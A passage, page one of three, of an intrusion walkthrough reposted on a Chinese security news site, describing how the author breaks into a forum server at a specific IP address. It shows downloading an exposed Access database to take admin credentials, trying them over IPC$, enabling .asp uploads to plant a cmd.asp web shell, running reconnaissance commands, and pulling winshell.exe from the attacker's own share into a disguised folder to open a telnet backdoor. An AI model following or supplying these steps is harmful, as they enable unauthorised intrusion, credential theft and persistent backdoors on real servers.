个人 企业
用户名:
密码:
 
企业服务   安全学院   安全资讯
安全动态  |  前沿技术  |  黑客防范安全漏洞防毒杀毒编程技术安全案例 |  电子政务产品推荐网管技术安全采购产品测评在线代理OICQ
检测评估安全学院软件下载互动交流安全沙龙应急咨询技术认证安全人才技术社区嘉宾聊天安全调查文章评论服务专线BLOG
  资讯 频道 国内    

一分钟注册享受免费网站安全评估

新闻热点

美国谋划夺取全球“制网权”
攻击指定IP地址及端口的黑客病毒
“黑客”三天侵吞21万获刑11年
微软浏览器IE7被发现存在两个漏洞
黑客入侵万达广场网站 提醒修复漏洞

软件热点
完美卸载V2007 完整版
防黑菜鸟必学系列视频教程
c语言视频教学30讲第14讲
黑客攻防绝招之三十六计
redhatlinux9安装的全程录像
IIS6最佳安全性实战
 
 
利用网站错误配置获得完全控制
时间:2008-2-22 9:57:22 作者:  出处:华盟收集
 

呵呵~果然是用access

  在自己的机器上装好此论坛,好好研究一下

  发现:数据库名是fuck.mdb,在/data下,呵呵~

  论坛有上传功能,需要设置,管理员登陆程序是poweruser_in.asp

  差不多了,可以看看运气如何了.

  http://61.61.13.13/bbs/data/fuck.mdb

  晕倒!竟然没改,可以下载,

  4M多,一会就完了,拿access2000或myadmin.asp打开数据库

  顺利拿到论坛管理帐号:play/1314520

  再看看运气,会不会论坛帐户密码和系统的一样:

  net use \\61.61.13.13\ipc$ "1314520" /user:"play"

  net use \\61.61.13.13\ipc$ "1314520" /user:"administrator"

  //运气不好,都失败.

  现在登陆论坛管理页,输入用户名及密码登陆论坛管理,

  熟练的找到上传设置(为什么会熟练呢?因为已经了解)

  将允许上传的文件类型中加上.asp

  知道要干什么了吧?对,上传个ASP小程序(在浏览器中得到一个命令条,输入命令后在浏览器中返回结果)

  上传cmd.asp到/upload下,好快,才1K多点,

  好喽~~,把刚才允许上传的文件类型中的.ASP再删掉,接着退出.

  在浏览器中:

  http://61.61.13.13/bbs/upload/cmd.asp

  出来了,呵呵~,收集点信息先:

  dir c:\ d:\ e:\

  net user

  net start

  net view

  netstat -an

  arp -a

  ...... //呵呵~~了解的差不多了

  对了,试试at命令:

  AT

  拒绝访问。

  倒,权限实在小的可怜啊!现在是需要提升权限了,

  那就要上传文件,又到论坛里传???不用了,

  虽然权限小,但还是有两种快捷的方法上传文件

  1. net use \\myIP\c$ "mypass" /user:"myname"

  2. tftp -i myIP get filename

  明白了吧?我选第一种方法上传文件

  先建立连接: net use \\myIP\c$ "mypass" /user:"myname" 命令成功完成

  现在是不能直接copy文件到当前目录的,

  因为当前默认路径是\winnt\system32,我们的权限小,这个目录我们是没有权限写的.

  (具体中,你可以使用cacls命令查看对文件的权限)

  那就建个目录先吧,建到d:\downloads下吧,那个目录我们有权限写:

  md d:\downloads\winzip32 //呵呵~这名字不错.

  先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊.

  copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 已复制一个文件

  启动它 d:\downloads\winzip32\winshell.exe 浏览器窗口会停好久,

  不用等的,程序已经启动了,点停止,接着,

  断开共享连接: net use \\myIP\c$ /del 完成

  离开浏览器,打开命令行窗口

总计3页  上一页  [1]  2  [3]  下一页

评论 | 收藏 | | 打印 | 关闭
相关新闻链接
     
关于Sec120 | 服务产品 | 联系我们 | 招贤纳才 | 广告服务 | 网站律师 | 网站地图 | 我要投稿

 

互联安全网  粤ICP备06118359 Copyright 1999-2007 All Right Reserved.